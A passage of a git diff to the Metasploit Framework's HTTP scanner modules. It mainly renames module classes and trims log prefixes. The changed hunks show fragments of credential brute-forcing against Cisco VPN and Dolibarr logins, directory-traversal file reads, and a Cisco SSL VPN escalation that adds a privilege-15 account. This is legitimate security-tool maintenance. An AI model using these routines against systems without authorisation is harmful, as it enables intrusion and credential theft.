Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/brute_dirs.rb b/modules/auxiliary/scanner/http/brute_dirs.rb index 5ffdf2bbdf..e2ecbafdbf 100644 --- a/modules/auxiliary/scanner/http/brute_dirs.rb +++ b/modules/auxiliary/scanner/http/brute_dirs.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'enumerable' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/buffalo_login.rb b/modules/auxiliary/scanner/http/buffalo_login.rb index 26d643853f..8b9aaed703 100644 --- a/modules/auxiliary/scanner/http/buffalo_login.rb +++ b/modules/auxiliary/scanner/http/buffalo_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/buffalo' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb b/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb index b3fb9cfa82..8fba970602 100644 --- a/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb +++ b/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/caidao' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/canon_wireless.rb b/modules/auxiliary/scanner/http/canon_wireless.rb index b9e1cdbf7b..971536a302 100644 --- a/modules/auxiliary/scanner/http/canon_wireless.rb +++ b/modules/auxiliary/scanner/http/canon_wireless.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb index 167bb24fc9..414f9c391b 100644 --- a/modules/auxiliary/scanner/http/cert.rb +++ b/modules/auxiliary/scanner/http/cert.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::WmapScanSSL diff --git a/modules/auxiliary/scanner/http/chef_webui_login.rb b/modules/auxiliary/scanner/http/chef_webui_login.rb index e8abdfe8f7..f048863072 100644 --- a/modules/auxiliary/scanner/http/chef_webui_login.rb +++ b/modules/auxiliary/scanner/http/chef_webui_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/chef_webui' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' } ) diff --git a/modules/auxiliary/scanner/http/chromecast_webserver.rb b/modules/auxiliary/scanner/http/chromecast_webserver.rb index 5ac407a826..35c1f1af47 100644 --- a/modules/auxiliary/scanner/http/chromecast_webserver.rb +++ b/modules/auxiliary/scanner/http/chromecast_webserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb index fc88a398a0..6dca2a3812 100644 --- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb +++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -38,18 +38,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? - print_error("#{peer} - Connection failed, Aborting...") + print_error("Connection failed, Aborting...") return end unless is_app_asdm? - print_error("#{peer} - Application does not appear to be Cisco ASA ASDM. Module will not continue.") + print_error("Application does not appear to be Cisco ASA ASDM. Module will not continue.") return end - print_status("#{peer} - Application appears to be Cisco ASA ASDM. Module will continue.") + print_status("Application appears to be Cisco ASA ASDM. Module will continue.") - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => '/', 'method' => 'GET' }) - print_good("#{peer} - Server is responsive...") + print_good("Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE return end @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi({ 'uri' => '/+webvpn+/index.html', @@ -138,17 +138,17 @@ class Metasploit3 < Msf::Auxiliary res.body.match(/Success/) && res.body.match(/success/) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - print_error("#{peer} - HTTP Connection Failed, Aborting") + print_error("HTTP Connection Failed, Aborting") return :abort end end diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 55d0033399..fe3ca21873 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index de6c042743..f1442e9410 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb index cf49d589a8..4bed3c6cf5 100644 --- a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb +++ b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb index 7f16552941..42e31918dc 100644 --- a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb +++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 5ad7ed6458..97aef41367 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -42,28 +42,28 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? - vprint_error("#{peer} - Connection failed, Aborting...") + vprint_error("Connection failed, Aborting...") return false end unless is_app_ssl_vpn? - vprint_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.") + vprint_error("Application does not appear to be Cisco SSL VPN. Module will not continue.") return false end - vprint_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.") + vprint_good("Application appears to be Cisco SSL VPN. Module will continue.") groups = Set.new if datastore['GROUP'].empty? - vprint_status("#{peer} - Attempt to Enumerate VPN Groups...") + vprint_status("Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups if groups.empty? - vprint_warning("#{peer} - Unable to enumerate groups") - vprint_warning("#{peer} - Using the default group: DefaultWEBVPNGroup") + vprint_warning("Unable to enumerate groups") + vprint_warning("Using the default group: DefaultWEBVPNGroup") groups << "DefaultWEBVPNGroup" else - vprint_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") + vprint_good("Enumerated VPN Groups: #{groups.to_a.join(", ")}") end else @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary end groups << "" - vprint_status("#{peer} - Starting login brute force...") + vprint_status("Starting login brute force...") groups.each do |group| each_user_pass do |user, pass| do_login(user, pass, group) @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary def check_conn? begin res = send_request_cgi('uri' => '/', 'method' => 'GET') - vprint_good("#{peer} - Server is responsive...") + vprint_good("Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, @@ -187,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page def do_login(user, pass, group) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}") begin cookie = "webvpn=; " + @@ -208,29 +208,29 @@ class Metasploit3 < Msf::Auxiliary post_params['group_list'] = group unless group.empty? - resp = send_request_cgi( - 'uri' => '/+webvpn+/index.html', - 'method' => 'POST', - 'ctype' => 'application/x-www-form-urlencoded', - 'cookie' => cookie, - 'vars_post' => post_params - ) + res = send_request_cgi( + 'uri' => '/+webvpn+/index.html', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'cookie' => cookie, + 'vars_post' => post_params + ) - if resp && - resp.code == 200 && - resp.body.match(/SSL VPN Service/) && - resp.body.match(/webvpn_logout/i) + if res && + res.code == 200 && + res.body.match(/SSL VPN Service/) && + res.body.match(/webvpn_logout/i) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") - do_logout(resp.get_cookies) + do_logout(res.get_cookies) report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) report_note(ip: rhost, type: 'cisco.cred.group', data: "User: #{user} / Group: #{group}") return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") end rescue ::Rex::ConnectionRefused, @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return :abort end end diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb index 505933f1fd..31fa2d011b 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' ) - vprint_good("#{peer} - Server is responsive") + vprint_good("Server is responsive") rescue ::Rex::ConnectionError, ::Errno::EPIPE return false end @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 - vprint_good("#{peer} - Logged out") + vprint_good("Logged out") end end @@ -117,8 +117,8 @@ class Metasploit3 < Msf::Auxiliary resp.body.include?('Cisco Adaptive Security Appliance Software Version') return resp.body else - vprint_error("#{peer} - Unable to run '#{command}'") - vprint_good("#{peer} - Retrying #{i} '#{command}'") unless i == 2 + vprint_error("Unable to run '#{command}'") + vprint_good("Retrying #{i} '#{command}'") unless i == 2 end end @@ -130,18 +130,18 @@ class Metasploit3 < Msf::Auxiliary password = Rex::Text.rand_text_alphanumeric(20) tries.times do |i| - vprint_good("#{peer} - Attemping to add User: #{username}, Pass: #{password}") + vprint_good("Attemping to add User: #{username}, Pass: #{password}") command = "username #{username} password #{password} privilege 15" resp = run_command(command, cookie) if resp && !resp.body.include?('Command authorization failed') && !resp.body.include?('Command failed') - vprint_good("#{peer} - Privilege Escalation Appeared Successful") + vprint_good("Privilege Escalation Appeared Successful") return [username, password] else - vprint_error("#{peer} - Unable to run '#{command}'") - vprint_good("#{peer} - Retrying #{i} '#{command}'") unless i == tries - 1 + vprint_error("Unable to run '#{command}'") + vprint_good("Retrying #{i} '#{command}'") unless i == tries - 1 end end @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary resp.body.include?('SSL VPN Service') && resp.body.include?('webvpn_logout') - vprint_good("#{peer} - Logged in with User: #{datastore['USERNAME']}, Pass: #{datastore['PASSWORD']} and Group: #{datastore['GROUP']}") + vprint_good("Logged in with User: #{datastore['USERNAME']}, Pass: #{datastore['PASSWORD']} and Group: #{datastore['GROUP']}") return resp.get_cookies else return false @@ -195,7 +195,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) # Validate we're dealing with Cisco SSL VPN unless validate_cisco_ssl_vpn - vprint_error("#{peer} - Does not appear to be Cisco SSL VPN") + vprint_error("Does not appear to be Cisco SSL VPN") return end @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary # interimittent based on session, so we'll just retry # 'X' times. datastore['RETRIES'].times do |i| - vprint_good("#{peer} - Exploit Attempt ##{i}") + vprint_good("Exploit Attempt ##{i}") # Authenticate to SSL VPN and get session cookie cookie = do_login( @@ -214,7 +214,7 @@ class Metasploit3 < Msf::Auxiliary # See if our authentication attempt failed unless cookie - vprint_error("#{peer} - Failed to login to Cisco SSL VPN") + vprint_error("Failed to login to Cisco SSL VPN") next end @@ -223,10 +223,10 @@ class Metasploit3 < Msf::Auxiliary if version && version_match = version.match(/Cisco Adaptive Security Appliance Software Version ([\d+\.\(\)]+)/) - print_good("#{peer} - Show version succeeded. Version is Cisco ASA #{version_match[1]}") + print_good("Show version succeeded. Version is Cisco ASA #{version_match[1]}") else do_logout(cookie) - vprint_error("#{peer} - Show version failed") + vprint_error("Show version failed") next end @@ -235,11 +235,11 @@ class Metasploit3 < Msf::Auxiliary do_logout(cookie) if creds - print_good("#{peer} - Successfully added level 15 account #{creds.join(", ")}") + print_good("Successfully added level 15 account #{creds.join(", ")}") user, pass = creds report_escalated_creds(user, pass) else - vprint_error("#{peer} - Failed to created user account on Cisco SSL VPN") + vprint_error("Failed to created user account on Cisco SSL VPN") end end end diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index a351f737aa..4f48e3a7a8 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] f = datastore['FILE'] @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.body =~ /^Fatal error\:/ - print_error("#{peer} - Unable to read '#{datastore['FILE']}', possibily because:") + print_error("Unable to read '#{datastore['FILE']}', possibily because:") print_error("\t1. File does not exist.") print_error("\t2. No permission.") print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.") @@ -78,10 +78,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") else - print_error("#{peer} - Fail to obtain file for some unknown reason") + print_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index c7517d32f1..5fd71d7fbc 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/coldfusion_version.rb b/modules/auxiliary/scanner/http/coldfusion_version.rb index b27972d810..c24e425ffa 100644 --- a/modules/auxiliary/scanner/http/coldfusion_version.rb +++ b/modules/auxiliary/scanner/http/coldfusion_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb index 15d9170e91..1198f3b850 100644 --- a/modules/auxiliary/scanner/http/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index 27d2ea545c..e528752cf4 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index ac9ac083f0..b3854ca22b 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::HttpCrawler diff --git a/modules/auxiliary/scanner/http/dell_idrac.rb b/modules/auxiliary/scanner/http/dell_idrac.rb index 0bbc7ecf82..7d60b0886b 100644 --- a/modules/auxiliary/scanner/http/dell_idrac.rb +++ b/modules/auxiliary/scanner/http/dell_idrac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index b759eb9fc3..609ab232b9 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dir_scanner.rb b/modules/auxiliary/scanner/http/dir_scanner.rb index 4c2263dba7..2ac59737ac 100644 --- a/modules/auxiliary/scanner/http/dir_scanner.rb +++ b/modules/auxiliary/scanner/http/dir_scanner.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'thread' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index 36f44b069b..e5ef0dc135 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb index a64f3b8a87..cd5d8c4308 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb index 8816247bf2..d5db9ee957 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb index f2e2ad293a..5651a583a7 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb b/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb index ebf3838a7b..5888615617 100644 --- a/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb +++ b/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb index 8acee32259..e56dd50a64 100644 --- a/modules/auxiliary/scanner/http/dolibarr_login.rb +++ b/modules/auxiliary/scanner/http/dolibarr_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -90,11 +90,11 @@ class Metasploit3 < Msf::Auxiliary # sid, token = get_sid_token if sid.nil? or token.nil? - vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue") + vprint_error("Unable to obtain session ID or token, cannot continue") return :abort else - vprint_status("#{peer} - Using sessiond ID: #{sid}") - vprint_status("#{peer} - Using token: #{token}") + vprint_status("Using sessiond ID: #{sid}") + vprint_status("Using token: #{token}") end begin @@ -114,22 +114,22 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT - vprint_error("#{peer} - Service failed to respond") + vprint_error("Service failed to respond") return :abort end if res.nil? - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return :abort end location = res.headers['Location'] if res and res.headers and (location = res.headers['Location']) and location =~ /admin\// - print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") + print_good("Successful login: \"#{user}:#{pass}\"") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.headers['Location']) return :next_user else - vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"") + vprint_error("Bad login: \"#{user}:#{pass}\"") return end end @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) each_user_pass { |user, pass| - vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") + vprint_status("Trying \"#{user}:#{pass}\"") do_login(user, pass) } end diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb index 56412ba3f2..de97da4895 100644 --- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb +++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary if res.body.include?('Access denied') # This probably means the Views Module actually isn't installed - print_error("#{peer} - Access denied") + print_error("Access denied") return Exploit::CheckCode::Safe elsif res.message != 'OK' || res.body != '[ ]' return Exploit::CheckCode::Safe @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary results << user_list.flatten.uniq end else - print_error("#{peer} - Unexpected results from server") + print_error("Unexpected results from server") return end end diff --git a/modules/auxiliary/scanner/http/ektron_cms400net.rb b/modules/auxiliary/scanner/http/ektron_cms400net.rb index 77ff86171e..33cc413ff2 100644 --- a/modules/auxiliary/scanner/http/ektron_cms400net.rb +++ b/modules/auxiliary/scanner/http/ektron_cms400net.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb index a521f753cf..410769edab 100644 --- a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb +++ b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary travs << payload.gsub('/', '%2f') travs << file.gsub('/', '%2f') - vprint_status("#{peer} - Retrieving file contents...") + vprint_status("Retrieving file contents...") res = send_request_raw( 'method' => 'GET', @@ -89,10 +89,10 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Checking if it's a vulnerable ElasticSearch") + vprint_status("Checking if it's a vulnerable ElasticSearch") check_code = check_host(ip) - print_status("#{peer} - #{check_code.second}") + print_status("#{check_code.second}") if check_host(ip) != Exploit::CheckCode::Appears return end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary contents = read_file(filename) unless contents - print_error("#{peer} - No file downloaded") + print_error("No file downloaded") return end @@ -123,6 +123,6 @@ class Metasploit3 < Msf::Auxiliary fcontent, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end end diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index d15f58d6b0..2e07b0c82c 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/http' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index fd0a168ace..fc17c05f01 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -6,7 +6,7 @@ require 